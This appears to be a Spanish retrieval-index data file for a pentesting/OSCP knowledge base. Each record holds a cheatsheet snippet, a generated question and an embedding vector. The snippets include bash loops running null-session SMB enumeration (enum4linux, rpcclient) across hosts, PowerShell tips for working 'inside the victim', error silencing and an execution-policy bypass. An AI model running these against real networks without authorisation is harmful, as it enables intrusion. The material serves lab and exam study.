-0.04814, -0.0596, -0.12371, -0.03718, 0.02575, -0.08393, 0.02655, -0.01798, -0.01607, 0.01562, 0.03648, -0.08779, -0.02567, -0.09001, 0.05187, -0.02421, 0.01099, -0.0705, 0.04842, -0.01263, -0.03993, -0.00516, -0.00112, -0.08224, 0.1041, 0.02197, -0.06285, 0.02827, -0.01218, -0.00139, -0.02212, 0.01018, -0.07106, 0.02004, 0.00825, 0.04824, 0.0309, 0.00265, 0.00335, -0.03397, -0.00719, 0.07968, -0.02371, 0.03249, 0.00212, -0.02961, 0.03395, 0.05033, 0.05533, -0.0582, -0.00863, 0.01427, -0.02311, 0.02929, 0.06752, -6e-05, 0.00993, 0.03032, -0.03523, 0.05978, 0.05317, -0.01159, -0.0502, -0.00019, -0.04239, -0.03548, -0.04006, 0.00946, -0.04673, 0.01715, -0.03335, -0.04925, 0.02352, -0.00577, -0.03368, -0.05063, -0.02149, -0.00476, 0.03728, -0.05099, 0.00931, -0.02117]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Enumerar SMB de todos y luego grep\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do enum4linux -a $ip < /dev/null > enum_$ip.txt 2>&1; done\ngrep -l \"alfred\" enum_*.txt # en QUΓ‰ host estΓ‘ el usuario\ngrep -iE 'remark|flag|OS\\{' enum_HOST.txt # flag en comentarios de shares\n```", "indexar": "cual es una tecnica para encontrar IPs con usuarios alfa usando herramientas de escaneo de servicios", "v": [-0.12378, -0.08009, -0.18177, -0.1535, 0.00476, -0.20985, -0.10936, -0.14059, -0.16115, 0.08215, -0.12593, -0.09734, -0.08211, -0.04282, 0.08746, -0.03411, 0.04463, -0.16584, 0.16427, 0.03248, -0.08408, 0.1465, -0.21566, -0.02496, -0.11415, 0.02143, -0.06492, -0.01001, -0.11022, -0.03249, -0.00038, -0.05487, -0.02285, -0.02161, -0.14869, -0.06629, 0.08222, 0.02602, 0.08849, 0.14033, -0.02816, -0.00072, -0.10401, -0.10676, 0.09636, 0.05339, -0.0192, -0.04549, -0.04929, 0.01123, -0.11719, -0.1457, -0.05859, -0.04217, -0.08889, -0.15996, 0.15489, -0.0723, -0.00891, -0.08532, -0.16487, 0.03145, -0.07464, 0.02364, -0.00559, -0.11244, -0.02208, -0.01076, -0.05361, 0.03079, 0.0139, 0.03292, -0.02395, -0.00559, -0.00776, -0.00384, -0.03389, 0.03177, 0.05446, -0.07759, -0.0004, 0.03452, -0.16213, -0.07479, -0.11201, -0.03746, 0.05647, -0.10439, 0.03055, -0.0581, 0.05375, 0.08304, 0.00819, 0.00313, 0.01851, 0.03498, 0.09804, 0.00726, 0.0181, -0.01938, 0.08917, 0.03638, -0.11447, 0.14526, 0.0035, 0.01808, 0.05211, -0.02879, -0.03846, -0.00706, -0.03063, 0.06847, -0.02136, -0.00528, 0.00381, -0.02337, 0.00365, -0.12982, -0.01559, -0.02476, 0.06906, 0.00601, -0.01097, 0.0053, 0.04777, 0.024, -0.01558, -0.01708, 0.02121, -0.0761, 0.03517, -0.07782, -0.08745, -0.01012, 0.00236, 0.01178, 0.06086, -0.08386, -0.00517, 0.02522, 0.01301, 0.025, -0.07974, -0.02088, 0.05069, -0.0408, 0.04385, -0.07758, -0.0427, -0.03136, -0.01057, -0.01645, -0.03008, 0.01567, -0.1008, -0.04955, -0.03691, -0.01548, -0.05637, -0.0193, -0.00152, -0.05385, 0.06835, 0.00982, -0.03503, -0.00895, -0.03035, 0.02963, 0.00694, -0.0364, 0.02657, 0.0555, 0.01771, -0.04836, -0.00991, 0.00433, -0.03483, -0.02158, -0.01323, -0.02107, -0.01756, 0.00144, 0.01615, 0.01762, 0.01807, -0.01524, 0.01041, -0.02435, 0.01236, -0.02478, -0.02208, 0.0288, -0.0159, -0.01236, 0.01509, -0.02559, -0.02554, -0.03433, -0.03584, -0.09765, -0.04399, 0.02854, -0.03688, -0.04861, -0.01418, -0.03334, 0.01323, -0.08398, 0.00846, -0.00903, 0.01321, -0.0045, 0.04762, -0.03831, -0.02897, -0.00917, 0.0089, 0.02737, 0.01119, -0.01548, -0.02668, -0.02431, -0.01693, -0.0153, -0.037, -0.00294, 0.00674, -0.02756, -0.00679, -0.00503, -0.01692, -0.00241, -0.02122, -0.01235, 0.00544, -0.03322, 0.03908, -0.00341, -0.01158, -0.01732, -0.016, 0.03818, -0.02082, 0.02036, -0.03019, -0.01263, -0.06003, -0.04441, -0.03021, -0.01366, 0.01785, 0.02482, 0.02198, -0.03494, 0.00269, -0.03051]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Flags en comentarios de shares de toda la red\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do echo \"=== $ip ===\"; rpcclient -U \"\" -N $ip -c \"netshareenumall\" 2>/dev/null | grep -i \"flag\\|OS{\"; done\n```\n\nRelacionado: SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "ΒΏquΓ© herramienta sirve para listar las flags de los shares de toda la red?", "v": [0.05984, 0.01485, -0.02441, -0.14599, 0.04326, -0.19658, -0.13309, -0.09067, 0.08948, -0.07868, -0.12475, -0.19513, 0.01444, -0.14288, 0.16202, 0.06662, -0.01635, -0.07918, 0.03401, -0.07086, -0.01351, 0.0268, -0.14113, -0.13129, -0.07748, -0.00806, 0.11874, -0.08582, -0.19774, 0.0891, -0.03381, -0.01189, -0.02956, -0.04654, -0.09011, 0.0013, 0.04887, 0.0423, 0.00707, 0.03187, -0.06339, 0.12213, -0.03907, -0.07752, -0.04789, -0.03643, -0.05534, 0.04452, 0.08947, 0.07465, -0.03547, -0.0997, -0.07987, -0.00536, -0.05665, -0.11752, 0.04477, -0.06139, -0.0364, -0.08794, -0.12201, -0.02078, -0.04158, -0.05408, -0.08073, -0.06791, -0.03601, -0.0394, -0.00936, 0.06406, 0.0159, 0.03178, 0.00984, -0.01744, -0.02342, 0.07995, 0.01969, -0.06697, 0.07434, 0.00166, 0.05538, -0.00651, -0.07991, -0.01133, 0.04802, -0.12408, 0.04541, -0.02949, 0.00707, -0.12231, -0.00502, 0.0876, 0.06346, -0.00874, -0.00652, 0.01354, 0.0623, -0.00356, -0.01594, -0.07704, 0.14131, -0.05153, -0.09044, -0.03692, 0.0045, 0.03888, -0.07846, 0.02352, 0.0149, 0.03731, 0.06282, -0.02615, -0.01964, 0.06017, 0.0465, 0.01915, 0.01389, -0.04514, -0.07868, -0.01552, 0.02803, 0.00092, -0.01804, -0.03479, 0.09255, -0.02052, -0.08417, 0.10901, -0.05191, 0.00253, -0.06677, 0.05394, -0.05778, -0.06199, -0.09473, -0.00274, -0.02303, -0.14153, 0.00285, -0.03295, 0.06131, 0.06372, -0.05763, -0.1302, 0.0552, 0.11675, 0.0455, -0.00897, -0.01865, 0.04194, 0.01419, -0.0802, -0.01509, -0.04331, 0.01469, 0.02012, 0.04518, 0.01311, -0.07783, 0.06984, -0.06296, -0.09452, -0.01269, 0.04668, 0.01938, 0.00809, 0.01903, 0.01574, 0.095, 0.02141, 0.07831, 0.11234, 0.04381, -0.05398, -0.04858, -0.05979, -0.04268, -0.0135, 0.01378, -0.05793, 0.03555, 0.01096, -0.00132, 0.02123, 0.09066, -0.06892, -0.03386, -0.02605, 0.05327, 0.00963, -0.06289, -0.06286, 0.00856, -0.05467, 0.03414, 0.05208, 0.01878, -0.07994, 0.01931, -0.01756, -0.04757, 0.00073, -0.0885, -0.02226, 0.0604, 0.06696, -0.01216, 0.03691, 0.01613, 0.01897, 0.01051, 0.0525, 0.07229, 0.02655, -0.0654, -0.03856, 0.0213, 0.05603, 0.0387, -0.06283, 0.07684, 0.03712, -0.02433, -0.01101, -0.06132, 0.0565, -0.01818, -0.0554, 0.04292, 0.01436, 0.05839, 0.00818, 0.01709, 0.03208, -0.04925, -0.09279, 0.01509, 0.0587, -0.05378, -0.02053, -0.02379, 0.04189, 0.00047, -0.01364, -0.02115, -0.0328, 0.00747, -0.03613, 0.02379, -0.06972, -0.0508, -0.022, 0.06692, 0.01241, 0.04291, -0.0267]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Flags en comentarios de shares de toda la red\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do echo \"=== $ip ===\"; rpcclient -U \"\" -N $ip -c \"netshareenumall\" 2>/dev/null | grep -i \"flag\\|OS{\"; done\n```\n\nRelacionado: SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con quΓ© puedo obtener el nombre del sistema operativo en los compartimentos de SMB y sus banderas", "v": [0.14721, 0.04143, -0.04928, -0.08208, -0.07847, -0.04791, -0.01787, -0.24129, -0.10799, -0.06378, -0.1669, 0.0002, 0.14769, -0.10694, 0.00064, 0.13348, -0.00655, -0.11771, -0.04382, -0.03516, -0.02532, -0.0732, 0.03712, 0.08681, -0.0257, 0.02555, -0.03949, 0.00559, -0.12488, 0.02203, -0.00834, 0.00253, 0.14626, -0.07089, 0.02546, -0.0362, -0.06709, 0.05095, 0.04461, -0.01146, 0.00791, -0.01966, -0.07, 0.03177, 0.08199, -0.0071, 0.01137, 0.11691, 0.02828, -0.15654, -0.03595, -0.00786, -0.16135, -0.07061, -0.05658, -0.1066, 0.14619, -0.04253, -0.01043, 0.00523, 0.00346, 0.02448, 0.07456, -0.02787, 0.02142, -0.09706, -0.01053, 0.02708, 0.10757, 0.01539, 0.00711, 0.12399, 0.01976, -0.03252, -0.02161, 0.18703, 0.00551, 0.0052, 0.06854, -0.00538, 0.03673, -0.02503, -0.07987, 0.06784, 0.05732, -0.14929, -0.05454, -0.02998, -0.03544, -0.07908, 0.01722, 0.07767, -0.03844, 0.1269, -0.00858, 0.01945, -0.04932, 0.12138, -0.01798, 0.01496, 0.04996, -0.01203, -0.11934, 0.0953, -0.00133, -0.01649, 0.02309, -0.02231, 0.12627, -0.03736, -0.02238, -0.05825, -0.01822, 0.03924, -0.06748, -0.01732, 0.01127, -0.02511, -0.0057, -0.03788, -0.12074, 0.07487, 0.05893, -0.04954, 0.1101, -0.0959, -0.04781, 0.09165, 0.05363, -0.003, -0.00294, 0.02276, 0.04922, -0.01724, -0.04259, -0.0202, -0.0848, -0.03892, 0.09115, -0.00013, -0.00562, 0.0526, 0.0622, -0.05799, 0.04229, 0.05167, 0.07176, -0.08672, 0.01473, -0.09651, 0.02886, 0.02812, -0.01261, -0.0122, 0.00299, 0.07463, 0.07006, -0.0813, -0.02896, -0.05512, -0.05812, 0.02906, -0.02564, 0.06487, -0.03516, -0.02905, -0.03421, -0.02622, 0.07201, 0.0152, -0.03374, 0.06714, 0.02351, -0.05666, -0.00034, -0.02609, -0.10061, -0.04877, 0.02316, -0.01013, -0.03948, 0.04412, -0.03063, 0.00104, 0.02194, -0.0479, -0.02344, 0.03563, 0.04033, 0.00497, 0.02785, 0.08316, -0.02574, 0.01417, -0.07814, 0.02623, -0.02568, -0.06121, 0.0658, -0.04147, -0.11222, 0.04851, -0.01577, -0.08582, 0.01608, 0.04112, -0.00862, 0.08081, 0.04463, 0.02224, 0.04012, 0.00658, 0.04388, -0.07971, -0.12529, 0.00744, -0.03469, 0.04606, 0.05407, -0.08732, 0.03412, 0.08521, 0.07876, 0.04388, -0.0326, -0.01016, -0.01649, 0.05344, 0.04439, 0.00381, 0.00738, 0.01272, -0.02654, -0.00953, 0.0598, 0.03161, -0.01588, -0.00604, -0.02981, -0.01801, 0.01448, 0.07856, -0.02329, -0.04427, -0.04664, -0.06471, -0.05391, -0.00865, -0.02944, -0.09206, 0.0012, 0.06601, 0.01627, -0.03074, 0.02447, -0.02476]} +{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Flags en comentarios de shares de toda la red\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do echo \"=== $ip ===\"; rpcclient -U \"\" -N $ip -c \"netshareenumall\" 2>/dev/null | grep -i \"flag\\|OS{\"; done\n```\n\nRelacionado: SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "existe alguna alternativa a rpcclient para enumerar las propiedades de los archivos de red?", "v": [-0.02005, 0.00014, -0.03179, -0.22606, 0.10953, -0.0977, 0.11844, 0.01951, -0.08846, -0.08742, -0.01699, -0.18669, 0.07723, -0.06686, 0.22456, -0.02719, -0.07957, 0.05492, 0.1652, 0.01015, -0.07772, -0.01275, -0.14055, 0.06222, -0.06436, 0.06277, 0.08245, 0.01695, 0.03247, 0.1142, 0.11437, -0.00482, 0.05489, -0.07311, -0.1608, 0.12707, 0.06806, 0.04547, -0.07646, 0.05324, 0.06889, 0.02364, -0.07002, 0.01813, -0.00869, 0.0308, -0.12177, -0.04527, -0.10373, -0.06166, -0.12304, -0.0968, -0.26161, 0.00262, 0.07862, -0.03979, -0.0139, -0.04382, 0.09575, 0.03535, -0.01995, 0.13612, -0.06782, 0.02036, -0.03729, 0.07884, -0.11544, 0.01334, -0.04235, 0.02284, 0.00736, 0.04468, 0.03396, -0.02884, -0.01191, -0.05378, 0.00825, -0.08964, 0.06203, 0.00074, -0.06544, 0.05805, -0.09423, -0.04225, -0.01827, -0.10682, 0.09444, -0.092, 0.01358, 0.03554, 0.04419, -0.03239, -0.00965, 0.06637, 0.00879, -0.11013, 0.08849, -0.06026, 0.01349, -0.01525, 0.01748, 0.09962, -0.04044, 0.04001, 0.11078, 0.04717, 0.00245, -0.01316, -0.02492, -0.01294, 0.00395, -0.00098, 0.03922, 0.07778, -0.05303, -0.07078, -0.07598, -0.06312, -0.03901, -0.03479, -0.04679, -0.03138, -0.06694, 0.00107, -0.03075, -0.01306, -0.04291, 0.07706, -0.05584, 0.05622, -0.00198, -0.01687, -0.05463, -0.06275, -0.11544, 0.00037, 0.04683, 0.03102, -0.01305, -0.04094, 0.06407, 0.00446, -0.09767, 0.00531, 0.06138, -0.00108, -0.02671, -0.02095, -0.03813, -0.02107, 0.02052, -0.05807, -0.09297, -0.00151, 0.01339, 0.0788, 0.00912, -0.01341, 0.00382, 0.0747, -0.03688, 0.02747, -0.05534, 0.0473, -0.01247, -0.083, 0.0335, 0.01958, -0.01622, -0.0446, 0.08178, 0.0374, -0.00209, -0.0779, -0.13354, 0.01626, -0.01724, -0.02173, 0.04952, -0.06072, 0.02376, -0.02047, -0.02965, 0.08211, 0.04099, -0.01933, -0.00722, -0.0106, -0.03637, -0.04659, -0.02037, -0.03349, -0.05901, -0.02791, -0.04507, 0.04562, -0.04362, -0.05393, -0.01088, -0.02659, -0.03859, -0.00907, -0.01824, 0.08273, 0.05342, 0.00431, -0.00029, 0.09649, -0.00452, 0.00988, 0.0332, 0.01071, 0.116, 0.01855, -0.02672, -0.0106, -0.0227, 0.02962, 0.02915, -0.04633, 0.06165, -0.04002, -0.01978, 0.06793, -0.01354, 0.06229, -0.02873, 0.023, 0.03199, 0.05294, 0.00734, -0.03164, 0.05128, 0.01754, -0.01773, -0.04572, 0.05236, -0.01435, 0.04425, 0.00013, 0.04936, -0.00324, 0.02218, 0.04016, -0.03857, 0.00832, -0.03363, 0.00371, 0.00537, -0.02961, 0.04404, 0.01708, 0.00382, -0.01227, 0.02737, 0.01846]} +{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores PowerShell\n\n> Para cuando trabajas **dentro** de la vΓ­ctima Windows. Base de Port scanner PowerShell.\n\n```\n| tuberΓ­a (igual que bash) Get-Process | Where-Object {...}\n% alias de ForEach-Object 1..200 | % { ... }\n$_ el elemento actual del bucle 1..10 | % { \"puerto $_\" }\n-and -or -not (o !) lΓ³gicos\n-eq -ne igual / distinto ($x -eq 5)\n-lt -gt -le -ge menor/mayor (-igual) ($port -lt 1000)\n> redirige a fichero\n2>$null silenciar errores (= 2>/dev/null)\nOut-Null tirar salida no deseada $c.Connect(..) | Out-Null\n` backtick = continuar en lΓ­nea siguiente (como \\ en bash)\n; separar comandos en una lΓ­nea\n```", "indexar": "con quΓ© herramienta puedo escanear puertos desde Windows usando PowerShell?", "v": [-0.04256, -0.04589, -0.09794, -0.11504, -0.01516, -0.072, 0.02166, -0.20858, -0.04014, -0.10156, -0.1686, 0.09491, -0.03134, -0.08807, -0.06599, 0.04099, 0.01476, -0.05312, 0.00944, 0.07274, -0.06519, -0.02531, -0.16162, -0.05052, -0.03614, 0.07632, 0.00445, 0.05288, -0.1972, -0.00474, -0.03208, 0.06143, 0.05737, -0.0562, -0.0743, -0.03844, -0.066, 0.11147, 0.1659, 0.11639, 0.00881, 0.11634, -0.08235, -0.01318, 0.09177, -0.0297, -0.03251, -0.08405, 0.0564, 0.01257, -0.12218, -0.11602, -0.14078, 0.01251, 0.06292, -0.13716, 0.14939, -0.03968, -0.00173, -0.07233, -0.0886, 0.1417, -0.06183, 0.00921, -0.06867, -0.0376, -0.01069, -0.06739, -0.05849, 0.13028, -0.13859, -0.00033, 0.07454, 0.01374, 0.05086, -0.0227, 0.02009, 0.0481, 0.07417, 0.01436, 0.03146, 0.00859, -0.08488, -0.06613, -0.02458, -0.0779, -0.04573, -0.07667, 0.03224, -0.16154, 0.05091, -0.03318, -0.04947, 0.13585, 0.01114, -0.03563, 0.01655, 0.00088, -0.02169, -0.00533, 0.07837, -0.06767, -0.09718, 0.07722, 0.02428, 0.01289, -0.00514, -0.10189, -0.06451, 0.01921, 0.059, 0.07049, 0.02834, -0.02795, -0.05478, 0.0699, -0.01594, -0.18245, -0.03893, 0.0113, 0.02586, -0.01004, -0.08803, 0.00156, 0.03621, -0.03052, 0.02638, 0.11946, -0.01706, -0.04468, 0.0629, -0.06329, -0.05302, -0.04716, -0.07225, -0.03398, 0.00368, -0.11494, -0.01225, -0.09275, -0.00509, 0.0902, -0.01894, -0.03694, -0.0023, 0.00071, 0.0182, 0.03428, -0.04334, -0.04126, 0.08502, -0.02441, -0.06637, 0.04294, -0.06594, 0.03666, 0.06488, 0.06802, -0.07815, -0.00129, -0.06727, -0.01344, 0.00639, 0.00779, 0.02544, -0.06731, -0.03486, 0.02474, 0.01161, 0.00527, 0.02515, 0.11669, -0.00793, -0.02146, 0.05082, -0.02082, -0.0007, -0.00932, -0.09099, -0.04606, -0.09371, 0.05879, -0.03186, -0.07275, -0.03379, -0.00704, -0.02631, -0.05269, -0.01045, 0.05623, -0.0596, 0.00968, 0.06111, -0.11372, 0.02068, 0.00824, -0.01385, -0.04222, 0.02531, -0.02297, -0.02453, 0.01725, -0.00852, -0.05202, 0.10858, 0.05992, -0.06256, 0.00642, 0.04512, 0.03199, 0.0254, 0.0072, 0.03048, -0.01097, -0.01235, -0.02552, 0.00549, 0.02456, -0.0191, 0.03457, -0.03572, 0.03482, 0.02911, 0.03081, -0.00548, 0.02565, -0.03065, 0.00304, -0.02053, 0.04693, 0.05805, 0.013, -0.04402, -0.02503, 0.0076, -0.03265, -0.0014, -0.00813, -0.04495, 0.00745, -0.03092, 0.01824, 0.00803, -0.03671, -0.04627, -0.04274, -0.00768, -0.01731, -0.00644, -0.04576, 0.00365, 0.02519, 0.03016, -0.07834, -0.01109, -0.01211]} +{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores PowerShell\n\n> Para cuando trabajas **dentro** de la vΓ­ctima Windows. Base de Port scanner PowerShell.\n\n```\n| tuberΓ­a (igual que bash) Get-Process | Where-Object {...}\n% alias de ForEach-Object 1..200 | % { ... }\n$_ el elemento actual del bucle 1..10 | % { \"puerto $_\" }\n-and -or -not (o !) lΓ³gicos\n-eq -ne igual / distinto ($x -eq 5)\n-lt -gt -le -ge menor/mayor (-igual) ($port -lt 1000)\n> redirige a fichero\n2>$null silenciar errores (= 2>/dev/null)\nOut-Null tirar salida no deseada $c.Connect(..) | Out-Null\n` backtick = continuar en lΓ­nea siguiente (como \\ en bash)\n; separar comandos en una lΓ­nea\n```", "indexar": "quΓ© comando de PowerShell me sirve para filtrar procesos especΓ­ficos?", "v": [-0.02071, 0.03648, -0.09267, -0.15158, -0.02834, -0.12839, 0.12084, -0.0779, -0.07029, -0.08975, -0.07289, 0.12588, 0.01603, -0.19289, 0.07176, 0.05185, 0.08055, -0.09039, -0.00326, -0.00963, -0.03038, -0.03965, -0.09182, -0.15424, -0.07133, 0.06263, 0.12783, 0.00474, -0.21217, -0.09543, 0.02545, 0.12246, 0.07501, -0.1004, -0.07936, 0.11035, -0.14853, 0.10107, -0.07139, 0.21023, -0.09595, 0.08366, -0.08051, 0.08287, 0.02252, -0.07347, -0.00302, -0.06579, 0.05511, -0.01467, -0.04555, -0.04387, -0.06085, 0.10372, -0.03168, -0.0673, -0.02777, -0.07716, 0.03014, -0.02422, -0.11623, -0.05252, 0.07939, 0.10464, -0.05021, -0.07951, -0.05546, -0.17135, -0.02998, 0.05056, -0.16974, 0.00769, 0.03825, -0.00202, 0.03948, 0.00907, 0.08141, 0.02126, 0.10758, -0.03563, 0.00062, 0.03019, -0.09195, 0.01499, -0.06117, -0.01568, -0.03943, -0.09425, -0.03638, -0.0315, 0.01132, 0.01107, -0.02333, 0.0381, 0.04493, 0.06425, 0.0501, 0.07962, 0.03618, 0.04511, 0.03277, -0.13394, -0.07142, 0.13665, 0.05182, 0.04815, 0.0434, -0.03746, -0.02526, -0.01502, -0.03533, -0.05798, 0.05798, -0.02102, 0.00523, -0.03797, 0.01002, -0.15164, -0.03494, -0.03626, -0.09449, -0.00756, 0.01172, 0.03082, 0.05728, -0.02181, 0.0125, 0.03233, 0.08434, 0.02053, -0.02597, 0.06258, -0.01572, -0.0517, -0.0342, 0.0119, 0.03218, -0.00783, -0.06622, -0.09717, -0.00854, 0.0654, -0.02139, 0.0463, 0.03049, -0.03141, 0.12385, -0.07501, 0.02026, 0.01192, 0.04201, -0.01316, -0.00236, 0.01016, -0.02356, -0.03212, -0.0236, -0.06969, -0.07928, -0.0027, -0.0874, 0.01195, -0.0536, 0.07041, 0.05104, 0.00503, -0.07353, -0.02286, 0.01785, -0.00978, 0.04289, 0.02253, -0.02868, -0.0119, -0.00803, -0.01464, -0.01269, -0.01767, -0.00837, 0.02364, -0.03152, 0.06801, 0.0051, -0.01796, -0.05927, 0.01491, -0.05179, -0.07819, -0.00207, 0.06218, -0.01455, 0.04362, -0.0182, -0.09263, 0.0365, -0.00588, -0.00052, -0.04583, -0.03142, -0.0504, -0.05001, 0.06469, -0.00688, 0.00467, 0.03414, 0.02872, -0.01859, 0.03108, -0.00238, -0.02377, 0.03363, 0.04598, 0.09491, 0.01549, -0.08011, -0.02057, 0.05438, -0.02925, 0.02516, 0.06407, 0.01961, 0.0077, 0.03402, 0.01171, 0.04424, 0.01753, 0.00115, -0.06857, 0.00982, 0.06337, -0.03178, -0.00638, -0.08278, -0.0266, -0.00636, -0.02752, -0.02899, -0.00932, -0.03772, -0.03365, 0.01793, 0.01925, -0.00887, -0.0593, -0.01914, -0.04194, -0.09006, 0.01669, -0.01587, -0.02335, -0.02927, -0.01723, -0.00577, -0.02434, 0.02938, -0.07018]} +{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Operadores PowerShell\n\n> Para cuando trabajas **dentro** de la vΓ­ctima Windows. Base de Port scanner PowerShell.\n\n```\n| tuberΓ­a (igual que bash) Get-Process | Where-Object {...}\n% alias de ForEach-Object 1..200 | % { ... }\n$_ el elemento actual del bucle 1..10 | % { \"puerto $_\" }\n-and -or -not (o !) lΓ³gicos\n-eq -ne igual / distinto ($x -eq 5)\n-lt -gt -le -ge menor/mayor (-igual) ($port -lt 1000)\n> redirige a fichero\n2>$null silenciar errores (= 2>/dev/null)\nOut-Null tirar salida no deseada $c.Connect(..) | Out-Null\n` backtick = continuar en lΓ­nea siguiente (como \\ en bash)\n; separar comandos en una lΓ­nea\n```", "indexar": "cΓ³mo ejecuto comandos PowerShell silenciosamente sin mostrar errores?", "v": [0.03038, 0.03635, -0.06079, -0.1343, -0.06125, -0.08018, -0.01149, -0.0403, -0.03294, -0.02023, -0.21911, 0.1116, 0.03139, -0.0506, 0.11813, 0.05527, 0.10929, 0.10105, -0.05985, -0.06337, 0.00565, -0.07367, -0.04302, -0.10283, 0.04026, 0.1108, -0.00334, 0.04833, -0.11434, -0.15638, -0.08865, 0.02049, 0.11198, -0.10756, -0.04848, 0.1507, -0.16826, -0.01459, -0.01853, 0.15823, -0.02581, 0.1587, -0.07848, -0.00087, -0.01089, -0.12538, 0.05032, -0.03611, 0.0427, -0.01309, -0.04594, -0.04564, -0.06352, -0.00073, -0.00277, -0.07661, 0.18642, -0.04006, 0.0249, -0.09627, -0.0083, -0.04096, 0.08821, 0.12158, -0.01627, 0.00455, -0.05553, -0.1507, -0.03099, 0.14756, -0.05841, 0.02506, 0.015, 0.08135, 0.10794, -0.03232, -0.00817, -0.04455, 0.0379, 0.0441, -0.02714, -0.02083, -0.0845, -0.01188, -0.05176, -0.03344, -0.11289, -0.06483, -0.11154, -0.09566, 0.09096, -0.00653, -0.00738, 0.04367, 0.08365, -0.03022, 0.06419, -0.02343, 0.02276, -0.01193, 0.10146, -0.05386, -0.09618, 0.04546, 0.09877, 0.09411, -0.01981, -0.01947, 0.01031, -0.07259, -0.04637, -0.07166, 0.01281, -0.01173, -0.00865, 0.00533, -0.00177, -0.13194, -0.04778, -0.04697, -0.09387, -0.04215, 0.01201, 0.02173, -0.02024, -0.01178, 0.02628, 0.02733, 0.09646, 0.04476, -0.01452, -0.03964, 0.14369, -0.05353, -0.0029, 0.12009, -0.00786, 0.04018, -0.11681, -0.16365, 0.07539, 0.04363, 0.00046, -0.04058, 0.05336, -0.01384, 0.02625, -0.02664, -0.08883, 0.02573, 0.07981, 0.06552, 0.00045, 0.03056, -0.0087, -0.04353, -0.03514, -0.04307, -0.00812, -0.01451, -0.07553, 0.02791, 0.00359, 0.04312, 0.04302, -0.05511, -0.06688, 0.06231, -0.01903, -0.03686, -0.00056, 0.02185, 0.01711, -0.02607, -0.02289, -0.02286, 0.0033, 0.02053, 0.03531, 0.04505, -0.0294, 0.00657, -0.05756, 0.04117, 0.00861, 0.01733, 0.06586, -0.08346, -0.01646, 0.03451, -0.0073, 0.02165, -0.02415, -0.06613, 0.04424, -0.0028, 0.04431, -0.0078, -0.02638, -0.03073, -0.06102, 0.01238, 0.00417, 0.0036, 0.04054, -0.01202, -0.00535, 0.05303, -0.03059, 0.02011, 0.04319, 0.00831, 0.07655, -0.03096, -0.04782, -0.03711, -0.03893, -0.02964, -0.08611, 0.0354, -0.01536, -2e-05, 0.04413, -0.02533, 0.03926, 0.05194, 0.0379, -0.05534, -0.00433, 0.02443, -0.01245, 0.04151, -0.08249, -0.02235, 0.02925, 0.0263, -0.02409, 0.02373, -0.03244, 0.00446, 0.04676, 0.02621, 0.05484, -0.0592, 0.01099, -0.0644, -0.03347, 0.00738, -0.02258, -0.01583, 0.01234, -0.02091, -0.02345, -0.08098, -0.03376, -0.1068]} +{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Trampas\n- `\"$_ABIERTO\"` se lee como variable `_ABIERTO` (vacΓ­a). **Pon espacio**: `\"$_ ABIERTO\"`.\n- Silenciar TODO al inicio de un script:\n ```powershell\n $ErrorActionPreference = \"SilentlyContinue\"\n $WarningPreference = \"SilentlyContinue\"\n ```\n Por comando: `-ea 0` (ErrorAction) Β· `-wa 0` (WarningAction).\n- Correr un `.ps1` bloqueado: `powershell -ep bypass -File .\\script.ps1`.\n\nRelacionado: Operadores Bash Β· Port scanner PowerShell Β· OSCP MOC", "indexar": "que comando en powershell silencΓ­a los errores y avisos?", "v": [-0.01791, 0.01313, 0.06612, -0.17561, 0.05563, -0.06946, 0.09871, -0.032, -0.04252, -0.05764, -0.08096, -0.04133, -0.00848, -0.03624, -0.00124, 0.05036, 0.04704, 0.09192, -0.0228, -0.05821, 0.04273, -0.04091, 0.02703, -0.04376, 0.04416, 0.06187, -0.00566, -0.02671, -0.14356, -0.12015, -0.08857, 0.01529, 0.12975, -0.02716, 0.02681, 0.14206, -0.12676, -0.00544, -0.01473, 0.22316, -0.00771, 0.15253, -0.1703, 0.03752, 0.03777, -0.11743, 0.01683, -0.0016, 0.02884, -0.02843, -0.03456, -0.0931, -0.02274, 0.06748, 0.03363, 0.05862, 0.18382, -0.02255, 0.00812, -0.09775, -0.12696, -0.04923, 0.01871, 0.14877, -0.06535, 0.08658, -0.01948, -0.16772, -0.08722, 0.07004, -0.02881, 0.01226, 0.01251, 0.06831, 0.03721, -0.04989, -0.02458, 0.01597, 0.08975, -0.02064, -0.08373, -0.00095, -0.0267, 0.03382, -0.08732, -0.09068, -0.02509, 